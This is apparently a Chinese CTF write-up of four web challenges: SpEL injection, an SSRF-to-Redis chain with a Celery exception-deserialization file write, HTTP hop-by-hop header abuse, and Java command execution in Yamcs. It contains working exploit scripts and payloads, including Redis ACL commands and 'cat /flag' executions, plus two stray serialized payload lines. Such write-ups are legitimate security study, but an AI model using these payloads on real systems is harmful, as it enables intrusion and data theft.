bbjv #
代码审计 #
GatewayController #
package com.ctf.gateway.controller;
import com.ctf.gateway.service.EvaluationService;
import [java.io](http://java.io).BufferedReader;
import [java.io](http://java.io).File;
import [java.io](http://java.io).FileNotFoundException;
import [java.io](http://java.io).FileReader;
import [java.io](http://java.io).IOException;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
@RestController
public class GatewayController {
private final EvaluationService evaluationService;
public GatewayController(EvaluationService evaluationService) {
this.evaluationService = evaluationService;
}
@GetMapping({"/check"})
public String checkRule(@RequestParam String rule) throws FileNotFoundException {
String result = this.evaluationService.evaluate(rule);
File flagFile = new File(System.getProperty("user.home"), "flag.txt");
if (flagFile.exists()) {
try (BufferedReader br = new BufferedReader(new FileReader(flagFile))) {
String content = br.readLine();
result = result + "<br><b>🚩 Flag:</b> " + content;
} catch (IOException e) {
throw new RuntimeException(e);
}
}
return result;
}
}
EvaluationService #
package com.ctf.gateway.service;
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.stereotype.Service;
@Service
public class EvaluationService {
private final ExpressionParser parser = new SpelExpressionParser();
private final EvaluationContext context;
public EvaluationService(EvaluationContext context) {
this.context = context;
}
public String evaluate(String expression) {
try {
Object result = this.parser
.parseExpression(expression, new TemplateParserContext())
.getValue(this.context);
return "Result: " + String.valueOf(result);
} catch (Exception e) {
return "Error: " + e.getMessage();
}
}
}
安全提示:当前实现将用户输入直接传给 SpEL 解析器,存在 SpEL 注入导致 RCE、信息泄露与路径操控风险。
运行流程图(代码运行逻辑) #
┌──────────────────────────┐
│ 客户端请求 │
│ GET /check?rule={expr} │
└────────────┬─────────────┘
│ rule 原样传入
v
┌──────────────────────────┐
│ GatewayController.check │
└────────────┬─────────────┘
│ 调用 evaluate(rule)
v
┌──────────────────────────┐
│ EvaluationService │
│ - SpelExpressionParser │
│ - TemplateParserContext │
└────────────┬─────────────┘
│ 解析并求值 expr
v
┌──────────────────────────┐
│ 结果字符串 result │
└────────────┬─────────────┘
│ 继续在 Controller
│ 读取 System.getProperty("user.home")
│ 拼接 "flag.txt"
v
┌──────────────────────────┐
│ 如果 user.home/flag.txt │───否──► 返回 result
│ 存在? │
└────────────┬─────────────┘
│是
v
┌──────────────────────────┐
│ 读取首行内容 content │
│ result += "🚩 " + content │
└────────────┬─────────────┘
v
┌──────────────────────────┐
│ 返回最终响应 │
└──────────────────────────┘
运行逻辑详解(精简) #
- 路由入口:GET /check 接收参数 rule。
- 表达式求值:EvaluationService 使用 SpEL 对 rule 求值,支持模板语法 #{…}。
- 文件读取:Controller 依据 System.getProperty(“user.home”) 组合 flag.txt 路径并尝试读取。
- 输出:返回求值结果,若读取到 flag 则附加到响应中。
漏洞分析(重点) #
- SpEL 注入(高危):用户可控的 expression 直接被 SpEL 求值,若上下文为标准上下文,可用 T() 访问类、调用静态方法、构造进程等,进而 RCE 或读敏感信息。
- 路径操控(中危):通过 SpEL 修改 #systemProperties[‘user.home’],可影响后续 flag 读取路径,间接实现任意目录下 flag.txt 的读取或与文件上传联动。
典型利用:
#{#systemProperties['user.home']='/tmp'}
随后程序将读取 /tmp/flag.txt 并回显。
修复建议(可落地) #
- 禁止直评用户表达式:仅允许预定义键到表达式的白名单映射。
Map<String,String> allowed = Map.of(
"check1", "#{someBean.method1()}",
"check2", "#{someBean.method2()}"
);
String exp = allowed.get(rule);
if (exp == null) throw new IllegalArgumentException("invalid rule");
parser.parseExpression(exp).getValue(context);
- 受限上下文:用 SimpleEvaluationContext 禁用类型访问与反射能力。
SimpleEvaluationContext sec = SimpleEvaluationContext
.forReadOnlyDataBinding()
.withInstanceMethods()
.build();
- 输入校验:若业务必须接受自由文本,使用严格模式和正则白名单,仅保留安全子集。
private static final Pattern SAFE = Pattern.compile("^[a-zA-Z0-9_]+$");
- 固定敏感路径:避免依赖可变系统属性,改为只读绝对路径并加最小权限。
Path FLAG = Paths.get("/var/app/secrets/flag.txt");
- 运行时最小权限:应用低权限用户运行,限制文件系统与进程创建能力。
复现 #
修改 user.home:#{#systemProperties['user.home']='/tmp'} 访问 /check 验证是否被读取。

总结 #
本程序的核心风险在于对用户输入的 SpEL 直评与对 user.home 的信任。攻击者可借此实现表达式注入与路径操控,导致信息泄露乃至 RCE。修复应同时从“禁用直评、收紧上下文、白名单校验、固定路径、最小权限”多点入手,确保即使单点失效也不至于被完全攻破。
CeleRace #
代码审计 #
@app.post("/tasks/fetch/<path:target>", middlewares=[require_admin])
def queue_fetch(target: str):
payload = request.get_json(silent=True) or {}
url = payload.get("url") or target
verb = payload.get("verb", "GET")
if not url:
return jsonify({"error": "url required"}, status=400)
host_header = payload.get("host")
body = payload.get("body")
return _queue("miniws.fetch", url=url, host_header=host_header, body=body, verb=verb)
这道题审计源码后,很明显的能够发现在/tasks/fetch/path:target下是存在一处SSRF的,乍一看似乎是发起http请求的SSRF,但是后续测试中,以打下redis为目标,猜测可以在verb字段进行一个伪造RESP数据流的包进行攻击,url字段只是提供一个目标ip
@celery_app.task(name="miniws.fetch")
def fetch_task(url: str, *, host_header: str | None = None, body: str | None = None, verb: str = "GET") -> Dict[str, Any]:
parsed = urlparse(url)
host = parsed.hostname or settings.redis_host
port = parsed.port or (443 if parsed.scheme == "https" else 80)
path = parsed.path or "/"
if parsed.query:
path = f"{path}?{parsed.query}"
request_host = host_header or parsed.netloc or f"{host}:{port}"
request_body = body.encode() if body else b""
payload = (
f"{verb} {path} HTTP/1.1\r\n"
f"Host: {request_host}\r\n"
"User-Agent: MiniFetch/1.0\r\n"
"Connection: close\r\n"
"\r\n"
).encode() + request_body
chunks: list[bytes] = []
with socket.create_connection((host, port), timeout=5) as sock:
sock.sendall(payload)
while True:
data = sock.recv(4096)
if not data:
break
chunks.append(data)
preview = b"".join(chunks)[:2048]
return {"preview": preview.decode(errors="replace"), "bytes": len(preview)}
但是显而易见的,这个接口上存在一个flask的修饰器去进行一个鉴权。
这里是通过path传入参数因此有理由怀疑出题者的意图在于发现了一个WSGI处理逻辑上的缺陷绕制能直接步入接口中
绕过require_admin的思路很快锁定在了两个方向:
- 黑盒FUZZ
- 对framework中的框架代码进行debug,发现其中的处理缺陷
解题 #
访问/tasks/fetch/../即可绕过权限
SSRF #
import json
import requests
URL = "http://127.0.0.1:5001/"
def to_resp(command_line: str) -> str:
args = command_line.strip().split()
resp = f"*{len(args)}\r\n"
for arg in args:
resp += f"${len(arg)}\r\n{arg}\r\n"
return resp + "\r\n\r\n\r\n\r\n*3"
def exp(verb):
# print(verb)
r = requests.post(
url=URL+ "/tasks/fetch/%2e%2e%2f%61",
json={
"url": "dict://127.0.0.1:6379/",
"verb": verb
}
)
task_id = r.json().get('task_id')
# print(task_id)
r = requests.get(
url=URL+ "/tasks/result",
params={
"id": task_id
}
)
res = r.json().get('result').get('preview')
return res
if __name__ == "__main__":
while True:
cmd = input("redis-cli> ")
if cmd.lower() in ('exit', 'quit'):
break
resp_str = to_resp(cmd)
res = exp(resp_str)
print(res)
前面SSRF探测过环境不可出网,且在redis.acl中发现对CONFIG这类指令权限控制的是挺死的,虽然可以直接用ACL指令关掉限制
ACL SETUSER default on ~* +@all nopass
但是redis版本过高,无法直接在redis-cli中修改dir、dbfilename等保护属性,也打不了前段时间的redis UAF

恶意类 #
整个代码让ai帮忙分析后,不难发现一个类DiagnosticsPersistError,这个类是一个自定义的Error类,但是很明显在整个项目中都没有使用到它,而且它的功能也非常可疑:
它的_maybe_persist方法中,很明显的存在一个任意文件写的点
def _maybe_persist(self, payload: str) -> None:
info = self._decode_payload(payload)
if not info:
return
target = info.get("path")
if not target:
return
path = Path(target)
mode = str(info.get("mode", "w"))
encoding = info.get("encoding", "utf-8")
data = info.get("content", "")
try:
path.parent.mkdir(parents=True, exist_ok=True)
if "b" in mode:
blob = self._ensure_bytes(data, encoding)
with path.open(mode) as fh: # type: ignore[call-arg]
fh.write(blob)
else:
text = self._ensure_text(data, encoding)
with path.open(mode, encoding=encoding) as fh:
fh.write(text)
except Exception:
return
并且可以看到在它的构造方法中去调用了这个可疑的方法,但是存在一个条件,就是需要写/tmp/debug这个文件
class DiagnosticsPersistError(RuntimeError):
"""Dormant exception used for development-time diagnostics persistence."""
_BASE_DIR = Path(os.environ.get("FRAMEWORK_DIAGNOSTICS_DIR", "/app/data")).resolve()
_DEBUG_SENTINEL = Path("/tmp/debug")
def __init__(self, payload: str, *args: Any, **kwargs: Any) -> None:
if self._DEBUG_SENTINEL.exists():
self._maybe_persist(payload)
super().__init__("diagnostics capture failed", *args, **kwargs)
def _maybe_persist(self, payload: str) -> None:
info = self._decode_payload(payload)
if not info:
return
写文件 #
拿到redis权限后,又要写文件,这里的第一反应应该是使用config set去设置redis的数据库来写文件,但是我们在上面已经提到了由于redis版本过高这是行不通的。那怎么办呢?
我们将视角切换到框架中,寻找有没有其他地方可以写文件
很快我们会发现存在这样一个FileSessionManager类,用来将session持久化保存在磁盘中
class FileSessionManager:
"""Manage loading and storing of file-based sessions."""
def __init__(self, secret: str = "devsecret", directory: str = "/tmp/sess", cookie_name: str = "mini_session", nonce_bytes: int = 8) -> None:
self.secret = secret.encode() if isinstance(secret, str) else secret
self.directory = directory
self.cookie_name = cookie_name
self.nonce_bytes = nonce_bytes
os.makedirs(self.directory, exist_ok=True)
保存session文件会调用下面这个方法,最终保存路径为path
def save(self, session: FileSession) -> None:
if not session.modified:
return
path = self._session_path(session.sid)
tmp_path = f"{path}.tmp-{secrets.token_hex(4)}"
payload = {key: value for key, value in session.items()}
with open(tmp_path, "w", encoding="utf-8") as fh:
json.dump(payload, fh, ensure_ascii=False, separators=(",", ":"))
os.replace(tmp_path, path)
session.modified = False
而我们去看看path的处理逻辑,非常明显的,这里存在一个路径拼接的漏洞
def _session_path(self, sid: str) -> str:
return os.path.join(self.directory, f"{sid}")
怎么去控制这个路径呢,实际上很容易发现就是将mini_session这个cookie的值改为../debug即可


CVE‑2021‑23727 #
到目前为止实际上最大的问题就是如何去实例化那个DiagnosticsPersistError,如果能够实例化它其实已经有很明确的思路就是写pycache去执行任意代码了,但是如何触发呢,联系到题目给出的celery,搜索引擎中搜索一下Celery的漏洞
https://security.snyk.io/vuln/SNYK-PYTHON-CELERY-2314953
本地尝试运行给出的poc,发现提示报错,即需要实例化的类必须是一个exception,题目中给的这个可疑的类不正好是RuntimeError么

进行一个小改
from celery.backends.base import Backend
from celery import Celery
from framework.app import DiagnosticsPersistError
b = Backend(Celery())
exc = {'exc_module': 'framework.app', 'exc_type': 'DiagnosticsPersistError', 'exc_message': 'test'}
b.exception_to_python(exc)
分析一下一个正常的任务的序列化数据的格式:
get celery-task-meta-eafa2211-9622-492b-bda6-78f7b88d7701
{"status": "SUCCESS", "result": {"echo": ""}, "traceback": null, "children": [], "date_done": "2025-10-28T06:06:31.343924", "task_id": "eafa2211-9622-492b-bda6-78f7b88d7701"}
这里合理猜测将status改为FAILURE,result改成我们预设的恶意payload
set celery-task-meta-eafa2211-9622-492b-bda6-78f7b88d7701 {"status":"RETRY","result":{"exc_module":"framework.app","exc_type":"DiagnosticsPersistError","exc_message":"7b0d0a202020202270617468223a20222f746d702f7465737474747474222c0d0a20202020226d6f6465223a202277222c0d0a2020202022656e636f64696e67223a20227574662d38222c0d0a2020202022636f6e74656e74223a2022706f7461746f206861636b6564220d0a7d0d0a"},"traceback":null,"children":[],"date_done":"2025-10-28T06:06:31.343924","task_id":"eafa2211-9622-492b-bda6-78f7b88d7701"}
触发一下

成功上传testtttt

O%3A4%3A%22test%22%3A3%3A%7Bs%3A8%3A%22readflag%22%3Bs%3A4%3A%22%2Ffl%2A%22%3Bs%3A1%3A%22f%22%3Bs%3A8%3A%22readfile%22%3Bs%3A3%3A%22key%22%3Bs%3A4%3A%22func%22%3B%7D
O%3A4%3A%22test%22%3A3%3A%7Bs%3A8%3A%22readflag%22%3Bs%3A3%3A%22123%22%3Bs%3A1%3A%22f%22%3Bs%3A4%3A%22test%22%3Bs%3A3%3A%22key%22%3Bs%3A5%3A%22class%22%3B%7D
SecretVault #
注册登录

代码审计 #
app.py
import base64
import os
import secrets
import sys
from datetime import datetime
from functools import wraps
import requests
from cryptography.fernet import Fernet
from flask import (
Flask,
flash,
g,
jsonify,
make_response,
redirect,
render_template,
request,
url_for,
)
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.exc import IntegrityError
import hashlib
## 模块说明:
## 这个 Flask 应用实现了一个简单的“密码保险库”(Vault)服务。
## - 提供用户注册、登录、登出功能。
## - 将各类服务的账号/密码以加密形式存储在数据库中(使用 Fernet 对称加密)。
## - 通过远程的签名服务(SIGN_SERVER)为登录用户签发 token,并把用户标识通过请求头 `X-User` 转发给后端应用。
## 注意:在生产环境中,需要妥善管理 `FERNET_KEY` 和签名密钥,避免敏感数据泄露。
db = SQLAlchemy()
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80), unique=True, nullable=False)
password_hash = db.Column(db.String(128), nullable=False)
salt = db.Column(db.String(64), nullable=False)
created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)
vault_entries = db.relationship('VaultEntry', backref='user', lazy=True, cascade='all, delete-orphan')
## User 表保存注册用户的信息:
## - username: 登录名(唯一)
## - password_hash: 经多轮 SHA256 哈希并 base64 编码的密码摘要(不可逆)
## - salt: 用于防止彩虹表的随机值(以 base64 编码存储)
class VaultEntry(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
label = db.Column(db.String(120), nullable=False)
login = db.Column(db.String(120), nullable=False)
password_encrypted = db.Column(db.Text, nullable=False)
notes = db.Column(db.Text)
created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)
## VaultEntry 表保存各条密码记录:
## - password_encrypted 字段保存的是使用 FERNET_KEY 加密后的密文(字符串形式)
def hash_password(password: str, salt: bytes) -> str:
data = salt + password.encode('utf-8')
for _ in range(50):
data = hashlib.sha256(data).digest()
return base64.b64encode(data).decode('utf-8')
## 对密码进行加盐并多轮哈希后返回 base64 编码的摘要。
## 这里使用 50 轮 SHA256 以增加暴力破解成本(但在生产应使用更强的 KDF,比如 PBKDF2/Argon2)。
def verify_password(password: str, salt_b64: str, digest: str) -> bool:
salt = base64.b64decode(salt_b64.encode('utf-8'))
return hash_password(password, salt) == digest
def generate_salt() -> bytes:
return secrets.token_bytes(16)
## 随机生成 16 字节盐值
def create_app() -> Flask:
app = Flask(__name__)
app.config['SECRET_KEY'] = secrets.token_hex(32)
app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', 'sqlite:///vault.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SIGN_SERVER'] = os.getenv('SIGN_SERVER', 'http://127.0.0.1:4444/sign')
fernet_key = os.getenv('FERNET_KEY')
if not fernet_key:
# 强制要求设置 FERNET_KEY 环境变量:这是对称加密的密钥,用于加密/解密密码条目。
# 如果没有该密钥,程序会直接报错并退出,避免以明文写入敏感信息。
raise RuntimeError('Missing FERNET_KEY environment variable. Generate one with `python -c "from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())"`.')
app.config['FERNET_KEY'] = fernet_key
db.init_app(app)
fernet = Fernet(app.config['FERNET_KEY'])
with app.app_context():
db.create_all()
if not User.query.first():
salt = secrets.token_bytes(16)
password = secrets.token_bytes(32).hex()
password_hash = hash_password(password, salt)
user = User(
id=0,
username='admin',
password_hash=password_hash,
salt=base64.b64encode(salt).decode('utf-8'),
)
db.session.add(user)
db.session.commit()
# 初始化时为演示/挑战环境创建一个 admin 用户并把 flag 写入一个 VaultEntry
# 注意:真实场景中不应在代码中直接读取 /flag 或在初始化流程中写入敏感标记。
# 这里保留原有逻辑,但提醒该行为仅供测试/CTF 用途。
flag = open('/flag').read().strip()
flagEntry = VaultEntry(
user_id=user.id,
label='flag',
login='flag',
password_encrypted=fernet.encrypt(flag.encode('utf-8')).decode('utf-8'),
notes='This is the flag entry.',
)
db.session.add(flagEntry)
db.session.commit()
def login_required(view_func):
@wraps(view_func)
def wrapped(*args, **kwargs):
uid = request.headers.get('X-User', '0')
print(uid)
# 该中间件依赖于反向代理/授权服务在请求头 `X-User` 中注入用户 id。
# - 若 `X-User` 为 'anonymous' 或未设置,则认为未登录并重定向到登录页。
# - 注意:此处并没有验证 token 本身,信任了上游服务对用户身份的判断。
if uid == 'anonymous':
flash('Please sign in first.', 'warning')
return redirect(url_for('login'))
try:
uid_int = int(uid)
except (TypeError, ValueError):
flash('Invalid session. Please sign in again.', 'warning')
return redirect(url_for('login'))
user = User.query.filter_by(id=uid_int).first()
if not user:
flash('User not found. Please sign in again.', 'warning')
return redirect(url_for('login'))
g.current_user = user
return view_func(*args, **kwargs)
return wrapped
@app.route('/')
def index():
uid = request.headers.get('X-User', '0')
if not uid or uid == 'anonymous':
return redirect(url_for('login'))
return redirect(url_for('dashboard'))
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
username = request.form.get('username', '').strip()
password = request.form.get('password', '')
confirm_password = request.form.get('confirm_password', '')
if not username or not password:
flash('Username and password are required.', 'danger')
return render_template('register.html')
if password != confirm_password:
flash('Passwords do not match.', 'danger')
return render_template('register.html')
salt = generate_salt()
password_hash = hash_password(password, salt)
user = User(
username=username,
password_hash=password_hash,
salt=base64.b64encode(salt).decode('utf-8'),
)
db.session.add(user)
try:
db.session.commit()
except IntegrityError:
db.session.rollback()
flash('Username already exists. Please choose another.', 'warning')
return render_template('register.html')
flash('Registration successful. Please sign in.', 'success')
return redirect(url_for('login'))
return render_template('register.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.form.get('username', '').strip()
password = request.form.get('password', '')
user = User.query.filter_by(username=username).first()
if not user or not verify_password(password, user.salt, user.password_hash):
flash('Invalid username or password.', 'danger')
return render_template('login.html')
# 向独立的签名服务请求签名 token(通常该服务会验证来源并返回签名好的 token)
# SIGN_SERVER 的默认地址在配置项 `SIGN_SERVER` 中,可由环境变量覆盖。
r = requests.get(app.config['SIGN_SERVER'], params={'uid': user.id}, timeout=5)
if r.status_code != 200:
flash('Unable to reach the authentication server. Please try again later.', 'danger')
return render_template('login.html')
token = r.text.strip()
response = make_response(redirect(url_for('dashboard')))
response.set_cookie(
'token',
token,
httponly=True,
secure=app.config.get('SESSION_COOKIE_SECURE', False),
samesite='Lax',
max_age=12 * 3600,
)
return response
return render_template('login.html')
@app.route('/logout')
def logout():
response = make_response(redirect(url_for('login')))
response.delete_cookie('token')
flash('Signed out.', 'info')
return response
@app.route('/dashboard')
@login_required
def dashboard():
user = g.current_user
entries = [
{
'id': entry.id,
'label': entry.label,
'login': entry.login,
'password': fernet.decrypt(entry.password_encrypted.encode('utf-8')).decode('utf-8'),
'notes': entry.notes,
'created_at': entry.created_at,
}
for entry in user.vault_entries
]
return render_template('dashboard.html', username=user.username, entries=entries)
@app.route('/passwords/new', methods=['POST'])
@login_required
def create_password():
user = g.current_user
label = request.form.get('label', '').strip()
login_value = request.form.get('login', '').strip()
password_plain = request.form.get('password', '').strip()
notes = request.form.get('notes', '').strip() or None
if not label or not login_value or not password_plain:
flash('Service name, login, and password are required.', 'danger')
return redirect(url_for('dashboard'))
encrypted_password = fernet.encrypt(password_plain.encode('utf-8')).decode('utf-8')
entry = VaultEntry(
user_id=user.id,
label=label,
login=login_value,
password_encrypted=encrypted_password,
notes=notes,
)
db.session.add(entry)
db.session.commit()
flash('Password entry saved.', 'success')
return redirect(url_for('dashboard'))
@app.route('/passwords/<int:entry_id>', methods=['DELETE'])
@login_required
def delete_password(entry_id: int):
user = g.current_user
entry = VaultEntry.query.filter_by(id=entry_id, user_id=user.id).first()
if not entry:
return jsonify({'success': False, 'message': 'Entry not found'}), 404
db.session.delete(entry)
db.session.commit()
return jsonify({'success': True})
return app
if __name__ == '__main__':
flask_app = create_app()
flask_app.run(host='127.0.0.1', port=5000, debug=False)
main.go
// 定义包名为main,表示这是一个可执行程序
package main
import (
"crypto/rand"
"encoding/hex"
"fmt"
"log"
"net/http"
"net/http/httputil"
"strings"
"time"
"github.com/golang-jwt/jwt/v5"
"github.com/gorilla/mux"
)
// 定义全局变量SecretKey,用于JWT签名
// 使用RandomBytes生成32字节随机数,然后转换为十六进制字符串
var (
SecretKey = hex.EncodeToString(RandomBytes(32))
)
// 定义JWT声明结构体,包含标准声明和用户ID
type AuthClaims struct {
jwt.RegisteredClaims // 嵌入JWT标准声明
UID string `json:"uid"` // 用户ID字段
}
// 生成指定长度的随机字节数组
func RandomBytes(length int) []byte {
b := make([]byte, length) // 创建指定长度的字节切片
if _, err := rand.Read(b); err != nil { // 从加密安全的随机数生成器读取随机字节
return nil // 如果出错返回nil
}
return b // 返回随机字节数组
}
// 为用户ID生成JWT令牌
func SignToken(uid string) (string, error) {
// 创建新的JWT令牌,使用HS256签名方法
t := jwt.NewWithClaims(jwt.SigningMethodHS256, AuthClaims{
UID: uid, // 设置用户ID
RegisteredClaims: jwt.RegisteredClaims{
Issuer: "Authorizer", // 设置签发者
Subject: uid, // 设置主题为用户ID
ExpiresAt: jwt.NewNumericDate(time.Now().Add(time.Hour)), // 设置过期时间为1小时后
IssuedAt: jwt.NewNumericDate(time.Now()), // 设置签发时间
NotBefore: jwt.NewNumericDate(time.Now()), // 设置生效时间
},
})
// 使用密钥签名令牌
tokenString, err := t.SignedString([]byte(SecretKey))
if err != nil { // 如果签名失败
return "", err // 返回空字符串和错误
}
return tokenString, nil // 返回签名后的令牌字符串
}
// 从HTTP请求中提取用户ID
func GetUIDFromRequest(r *http.Request) string {
// 从请求头中获取Authorization字段
authHeader := r.Header.Get("Authorization")
if authHeader == "" { // 如果请求头中没有Authorization
cookie, err := r.Cookie("token") // 尝试从Cookie中获取token
if err == nil { // 如果Cookie存在
authHeader = "Bearer " + cookie.Value // 构造Bearer格式的认证头
} else { // 如果Cookie也不存在
return "" // 返回空字符串
}
}
// 检查Authorization头格式是否正确(至少7个字符且以"Bearer "开头)
if len(authHeader) <= 7 || !strings.HasPrefix(authHeader, "Bearer ") {
return "" // 格式不正确返回空字符串
}
// 提取令牌字符串(去掉"Bearer "前缀)
tokenString := strings.TrimSpace(authHeader[7:])
if tokenString == "" { // 如果令牌为空
return "" // 返回空字符串
}
// 解析JWT令牌
token, err := jwt.ParseWithClaims(tokenString, &AuthClaims{}, func(token *jwt.Token) (interface{}, error) {
// 验证签名方法是否为HMAC
if _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {
return nil, fmt.Errorf("unexpected signing method: %v", token.Header["alg"])
}
return []byte(SecretKey), nil // 返回用于验证的密钥
})
if err != nil { // 如果解析失败
log.Printf("failed to parse token: %v", err) // 记录错误日志
return "" // 返回空字符串
}
// 获取令牌声明并验证令牌有效性
claims, ok := token.Claims.(*AuthClaims)
if !ok || !token.Valid { // 如果声明类型不匹配或令牌无效
log.Printf("invalid token claims") // 记录错误日志
return "" // 返回空字符串
}
return claims.UID // 返回用户ID
}
// 主函数
func main() {
// 创建反向代理,用于转发请求到后端服务
authorizer := &httputil.ReverseProxy{Director: func(req *http.Request) {
req.URL.Scheme = "http" // 设置目标URL协议为HTTP
req.URL.Host = "127.0.0.1:5000" // 设置目标主机和端口
// 从请求中获取用户ID
uid := GetUIDFromRequest(req)
// 记录请求的用户ID和URL
log.Printf("Request UID: %s, URL: %s", uid, req.URL.String())
// 删除可能存在的认证相关头部
req.Header.Del("Authorization")
req.Header.Del("X-User")
req.Header.Del("X-Forwarded-For")
req.Header.Del("Cookie")
// 根据用户ID设置X-User头部
if uid == "" { // 如果没有用户ID
req.Header.Set("X-User", "anonymous") // 设置为匿名用户
} else { // 如果有用户ID
req.Header.Set("X-User", uid) // 设置为实际用户ID
}
}}
// 创建用于令牌签名的路由器
signRouter := mux.NewRouter()
// 注册/sign路由处理函数
signRouter.HandleFunc("/sign", func(w http.ResponseWriter, r *http.Request) {
// 检查请求是否来自本地(安全限制)
if !strings.HasPrefix(r.RemoteAddr, "127.0.0.1:") {
http.Error(w, "Forbidden", http.StatusForbidden) // 返回403禁止访问
}
// 从URL查询参数中获取用户ID
uid := r.URL.Query().Get("uid")
// 为用户ID生成令牌
token, err := SignToken(uid)
if err != nil { // 如果生成令牌失败
log.Printf("Failed to sign token: %v", err) // 记录错误日志
http.Error(w, "Failed to generate token", http.StatusInternalServerError) // 返回500错误
return
}
w.Write([]byte(token)) // 将令牌写入响应
}).Methods("GET") // 限制只接受GET请求
// 记录令牌服务启动信息
log.Println("Sign service is running at 127.0.0.1:4444")
// 在goroutine中启动令牌服务
go func() {
if err := http.ListenAndServe("127.0.0.1:4444", signRouter); err != nil {
log.Fatal(err) // 如果启动失败则退出程序
}
}()
// 记录授权中间件服务启动信息
log.Println("Authorizer middleware service is running at :5555")
// 启动授权中间件服务
if err := http.ListenAndServe(":5555", authorizer); err != nil {
log.Fatal(err) // 如果启动失败则退出程序
}
}
entrypoint.sh
#!/bin/sh
chmod 600 /entrypoint.sh
if [ ${ICQ_FLAG} ];then
echo -n ${ICQ_FLAG} > /flag
chown vault:nogroup /flag
chmod 400 /flag
echo [+] ICQ_FLAG OK
unset ICQ_FLAG
else
echo [!] no ICQ_FLAG
fi
start_authorizer() {
su authorizer -s /bin/sh -c /app/authorizer/authorizer &
}
start_vault() {
cd /app/vault && FERNET_KEY=$(python -c "from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())") su vault -s /bin/sh -c "python3 app.py" &
}
start_authorizer
start_vault
wait -n
这段代码其实就是启动一下两个服务:
- Go授权服务 (
authorizer) - Flask保险库应用 (
vault)
有一个admin管理员用户中存放了flag。那么接下来要做的就是进入admin管理员用户。
只要让请求有的X-User字段值为0就可以进入dashboard
客户端的请求是先发送到authorizer也就是go,然后再转发到vault也就是flask的。
authorizer(Go): 运行在:5555端口,作为所有传入请求的反向代理。它负责处理JWT认证,并根据认证结果设置X-User头部,然后将请求转发到vault服务(127.0.0.1:5000)。同时,它还在127.0.0.1:4444端口提供一个/sign接口,用于生成JWT。vault(Flask): 运行在127.0.0.1:5000端口,是实际的密码保险库Web应用。它通过读取X-User头部来识别用户身份,并提供用户注册、登录、密码存储和查看等功能。Flag被存储在id=0的admin用户的密码条目中。
但是在authorizer中会对我们的部分请求头进行删除和重建,那么我们简单地在请求头中添加X-User就没用了。
整理一下服务交互流程:
- 用户请求发送到
authorizer服务(:5555)。 authorizer解析请求中的Authorization头部或tokencookie,提取JWT并验证。如果有效,则提取UID。authorizer删除原始请求中的Authorization、X-User、X-Forwarded-For、Cookie头部。authorizer根据提取到的UID设置新的X-User头部(如果UID为空,则设置为anonymous)。authorizer将修改后的请求转发到vault服务(127.0.0.1:5000)。vault服务根据X-User头部进行用户认证和业务逻辑处理。
那么我们接下来就要想办法让go删除请求头后还能存在X-User!
解题 #
HTTP请求走私
authorizer(Go语言net/http/httputil.ReverseProxy)和vault(Flask)对HTTP请求头部的解析方式存在差异,导致请求边界的混淆。
Connection: close用于关闭连接,防止后续请求被误读。而X-User被添加到Connection头部中,这是一种常见的HTTP请求走私技术,用于在某些代理或服务器中导致X-User头部被错误地解析或保留,从而绕过authorizer的清理逻辑。
Connection: close,X-User

yamcs #

题目分析 #
这道题基于一个 Yamcs Quickstart 环境。Yamcs 是一个开源的遥测与指挥控制系统,它提供一个 Web 界面来管理“项目(projects)”、“算法(algorithms)”、“模拟器(simulators)”等功能。
Yamcs 的 “Algorithms” 模块允许用户定义 JavaScript 或 Java 表达式,用来实时处理遥测数据。
但是出题人把“代码执行”功能放开了(通常应该禁用),于是我们可以编写 Java 代码并让它执行在服务端。这一步的作用是让算法运行时执行,并将输出显示在 Trace 面板中。Trace 面板会打印算法的输出变量值(包括异常、执行结果等),因此我们可以在那看到命令执行结果。
Yamcs 的算法执行环境支持 Java,因此可以直接写类似这样的代码:
Process process = Runtime.getRuntime().exec("cat /flag");
这样就能让服务器执行系统命令。不过,为了兼容性和安全性,WP 中用的命令是:
String[] commandArray = {"/usr/bin/env", "bash", "-c", "cat /flag"};
Process process = Runtime.getRuntime().exec(commandArray);
这段代码有几个关键点:
"/usr/bin/env", "bash", "-c", "cat /flag"是一种安全写法,确保环境变量 PATH 有效;Runtime.getRuntime().exec()让 JVM 调用系统命令;- 通过
process.getInputStream()把命令执行结果读出来; - 把结果写到
out0变量,这样 Yamcs 的 trace 界面会显示结果; - 最后加上
"RETURN_VALUE=" + returnValue方便调试确认命令是否成功。
Yamcs 的算法执行不是在交互式终端中,而是后台执行。输出不会直接返回到前端页面。因此必须通过:
out0.setStringValue(resultText);
把结果写进算法的输出变量。Yamcs 的 trace 功能会自动记录 out0 的值,于是我们可以在 Web 界面中看到 flag。
解题过程 #
进入myproject下面的Algorithms,来到/myproject/copySunsensor 开启trace

在这执行代码,点击save
try {
String[] commandArray = {"/usr/bin/env", "bash", "-c", "cat /flag"};
Process process = Runtime.getRuntime().exec(commandArray);
java.io.InputStream inputStream = process.getInputStream();
java.io.ByteArrayOutputStream buffer = new java.io.ByteArrayOutputStream();
byte[] dataBlock = new byte[4096];
int bytesRead;
while ((bytesRead = inputStream.read(dataBlock)) != -1) {
buffer.write(dataBlock, 0, bytesRead);
}
int returnValue = process.waitFor();
String resultText = buffer.toString(java.nio.charset.StandardCharsets.UTF_8.name());
out0.setStringValue(resultText + "RETURN_VALUE=" + returnValue);
} catch (java.io.IOException e) {
out0.setStringValue("IO_ERROR: " + e.toString());
} catch (InterruptedException e) {
out0.setStringValue("PROCESS_INTERRUPTED: " + e.toString());
}

在trace中看见flag
